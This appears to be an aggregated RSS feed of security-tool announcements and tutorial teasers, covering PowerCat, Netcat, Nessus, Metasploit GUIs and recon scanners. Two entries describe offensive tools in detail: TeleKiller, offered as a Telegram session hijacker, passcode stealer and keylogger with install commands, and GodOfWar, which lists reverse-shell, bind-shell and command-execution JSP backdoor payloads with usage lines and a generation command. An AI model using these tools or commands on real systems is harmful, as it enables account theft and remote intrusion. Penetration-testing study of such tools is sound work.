PowerCat -A PowerShell Netcat

The word PowerCat named from Powershell Netcat which is a new version of netcat in the form of the powershell script. In this article, we will learn about powercat which a PowerShell tool for is exploiting windows machines. Table of Content Requirement & Installations Testing PowerShell Communication Bind Shell Execute Shell Tunnelling or port forwarding… Continue reading →
The post PowerCat -A PowerShell Netcat appeared first on Hacking Articles.

Link: https://www.hackingarticles.in/powercat-a-powershell-netcat/

Web Server Lab Setup for Penetration Testing

In this post, we will discuss how to set-up our own web server for penetration testing on Ubuntu 18. Ubuntu 18 has updated with the new features. Table of Content Requirement Web Server configuration Apache PHP MySQL phpMyAdmin FTP SSH Nmap Requirement-ubuntu 18.0 Web Server Configuration The Web server is a program that uses HTTP to serve users with files forming web pages in response to requests transmitted by their HTTP clients. The Web servers can also be called dedicated computers and apparatuses. Install Apache First, we will install the Apache…. Continue reading →
The post Web Server Lab Setup for Penetration Testing appeared first on Hacking Articles.

Link: https://www.hackingarticles.in/web-server-lab-setup-for-penetration-testing/


PenTestIT RSS Feed
I read a tweet about two days ago and today, MITRE CALDERA 2.0 is out already! If you remember, I wrote briefly about this automated adversary emulation system in my post titled – List of Adversary Emulation Tools. This is a major update and this post is about the changes I personally see in thisRead more about UPDATE: MITRE CALDERA 2.0
The post UPDATE: MITRE CALDERA 2.0 appeared first on PenTestIT.

Link: http://pentestit.com/update-mitre-caldera-2-0/

Reverie – Automated Pentest Tools Designed For Parrot Linux

Automated Pentest Tools Designed For Parrot Linux.this tool will make your basic pentesting task like Information Gathering, Security Auditing, And Reporting so this tool will do every task fully automatic.Usage GuideDownload / Clone~# git clone https://github.com/baguswiratmaadi/reverieGo Inside reverie Dir~# cd reverieGive Permission To reverie~# chmod 777 *.shRun reverie without install~# ./reverie.shIf you want to install reverie~# ./install.shChangelog1.0 First Release 1.1 Fixing Error In Nikto Command Line Pentest Tools Auto Executed With ReverieWhois LookupDNSwalkNmapDmitryWhatwebwafw00fLoad Balancing DetectorSSLyzeTLSSledAutomaterNiktoAnd More Tool SoonScreenshotthis is preview of Reverie Auto PentestTools Preview Output ResultReport In HTML DisclaimerDo not scan government and private IT objects without legal permission.Do At Your Own RiskDownload Reverie

Link: http://feedproxy.google.com/~r/PentestTools/~3/I5j5E3B9o2w/reverie-automated-pentest-tools.html

TeleKiller – A Tool Session Hijacking And Stealer Local Passcode Telegram Windows

A Tools Session Hijacking And Stealer Local passcode Telegram Windows.Features :Session HijackingStealer Local PasscodeKeyloggerShellBypass 2 Step VerificationBypass Av (Coming Soon)Installation Windowsgit clone https://github.com/ultrasecurity/TeleKiller.gitcd TeleKillerpip install -r requirements.txtpython TeleKiller.pyDependency :python 2.7pyHookpywin32Video TutorialOperating Systems TestedWindows 10Windows 8.1Windows 8Windows 7ContactWebSite Ultra Security Team: https://ultrasec.orgChannel Telegram: https://t.me/UltraSecurityThanks toMilad RanjbarMrQadirDownload TeleKiller

Link: http://www.kitploit.com/2019/04/telekiller-tool-session-hijacking-and.html

GodOfWar – Malicious Java WAR Builder With Built-In Payloads

A command-line tool to generate war payloads for penetration testing / red teaming purposes, written in ruby.FeaturesPreexisting payloads. (try -l/–list)cmd_getfilebrowserbind_shellreverse_shellreverse_shell_uiConfigurable backdoor. (try –host/-port)Control over payload name.To avoid malicious name after deployment to bypass URL name signatures.Installation$ gem install godofwarUsage$ godofwar -h Help menu: -p, –payload PAYLOAD Generates war from one of the available payloads. (check -l/–list) -H, –host IP_ADDR Local or Remote IP address for the chosen payload (used with -p/–payload) -P, –port PORT Local or Remote Port for the chosen payload (used with -p/–payload) -o, –output [FILE] Output file and the deployment name. (default is the payload original name. check ‘-l/–list’) -l, –list list all available payloads. -h, –help Show this help message.ExampleList all payloads$ godofwar -l├── cmd_get│   └── Information:│ ├── Description: Command execution via web interface│ ├── OS: any│ ├── Settings: {“false"=>"No Settings required!"}│ ├── Usage: http://host/cmd.jsp?cmd=whoami│ ├── References: ["https://github.com/danielmiessler/SecLists/tree/master/Payloads/laudanum-0.8/jsp"]│ └── Local Path: /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/cmd_get├── filebrowser│   └── Information:│ ├── Description: Remote file browser, upload, download, unzip files and native command execution│ ├── OS: any│ &#9500 ;── Settings: {"false"=>"No Settings required!"}│ ├── Usage: http://host/filebrowser.jsp│ ├── References: ["http://www.vonloesch.de/filebrowser.html"]│ └── Local Path: /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/filebrowser├── bind_shell│   └── Information:│ ├── Description: TCP bind shell│ ├── OS: any│ ├── Settings: {"port"=>4444, "false"=>"No Settings required!"}│ ├── Usage: http://host/reverse-shell.jsp│ ├── References: ["Metasploit – msfvenom -p java/jsp_shell_bind_tcp"]│ └ ── Local Path: /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/bind_shell├── reverse_shell_ui│   └── Information:│ ├── Description: TCP reverse shell with a HTML form to set LHOST and LPORT from browser.│ ├── OS: any│ ├── Settings: {"host"=>"attacker", "port"=>4444, "false"=>"No Settings required!"}│ ├── Usage: http://host/reverse_shell_ui.jsp│ ├── References: []│ └── Local Path: /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/reverse_shell_ui├── reverse_shell│   └── Information:│ ├── De scription: TCP reverse shell. LHOST and LPORT are hardcoded│ ├── OS: any│ ├── Settings: {"host"=>"attacker", "port"=>4444, "false"=>"No Settings required!"}│ ├── Usage: http://host/reverse_shell.jsp│ ├── References: []│ └── Local Path: /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/reverse_shellGenerate payload with LHOST and LPORTgodofwar -p reverse_shell -H -P 9911 -o puppyAfter deployment, you can visit your shell on (http://host:8080/puppy/puppy.jsp)ContributingFork it ( https://github.com/KINGSABRI/godofwar/fork ).Create your feature branch (git checkout -b my-new-feature).Commit your changes (git commit -am ‘Add some feature’).Push to the branch (git push origin my-new-feature).Create a new Pull Request.Add More BackdoorsTo contribute by adding more backdoors:create a new folder under payloads directory.put your jsp file under the newly created directory (make it the same directory name).update payloads_info.json file withdescription.supported operating system (try to make it universal though).configurations: default host and port.references: the payload origin or its creator credits.Download Godofwar

Link: http://feedproxy.google.com/~r/PentestTools/~3/48DUIB_ttEQ/godofwar-malicious-java-war-builder.html

Beginner’s Guide to Nessus

In this article, we will learn about Nessus which is a network vulnerability scanner. There are various network vulnerability scanners but Nessus is one of the best because of its most successful GUI. Therefore, it is widely used in multiple organizations. The tools were developed by Renuad Deraison in the year 1998. Table of Content… Continue reading →
The post Beginner’s Guide to Nessus appeared first on Hacking Articles.

Link: https://www.hackingarticles.in/beginners-guide-to-nessus/

Kage: Graphical User Interface for Metasploit

Kage is a GUI for Metasploit RCP servers. It is a good tool for beginners to understand the working of Metasploit as it generates payload and lets you interact with sessions. As this tool is on the process of developing, till now it only supports windows/meterpreter and android/meterpreter.  For it to work, you should have… Continue reading →
The post Kage: Graphical User Interface for Metasploit appeared first on Hacking Articles.

Link: https://www.hackingarticles.in/kage-graphical-user-interface-for-metasploit/

Osmedeus – Fully Automated Offensive Security Tool For Reconnaissance And Vulnerability Scanning

Osmedeus allow you automated run the collection of awesome tools to reconnaissance and vulnerability scanning against the target.How to useIf you have no idea what are you doing just type the command below or check out the Advance Usage./osmedeus.py -t example.comInstallationgit clone https://github.com/j3ssie/Osmedeuscd Osmedeus./install.shThis install only focus on Kali linux, check more install on Wiki pageFeaturesSubdomain Scan.Subdomain TakeOver Scan.Screenshot the target.Basic recon like Whois, Dig info.IP Discovery.CORS Scan.SSL Scan.Headers Scan.Port Scan.Vulnerable Scan.Seperate workspaces to store all scan output and details logging.REST API.SPA Web UI.Slack notifications.DemoScreenshotsContact@j3ssiejjjDownload Osmedeus

Link: http://feedproxy.google.com/~r/PentestTools/~3/DCeXRDXo4J0/osmedeus-fully-automated-offensive.html

Comprehensive Guide on Netcat

This article will provide you with the basic guide of Netcat and how to get a session from it using different methods. Table of Contents: Introduction Features Getting start with NC Connecting to a Server Fetching HTTP header Chatting Creating a Backdoor Verbose Mode Save Output to Disk Port Scanning TCP Delay Scan UDP Scan… Continue reading →
The post Comprehensive Guide on Netcat appeared first on Hacking Articles.

Link: https://www.hackingarticles.in/comprehensive-guide-on-netcat/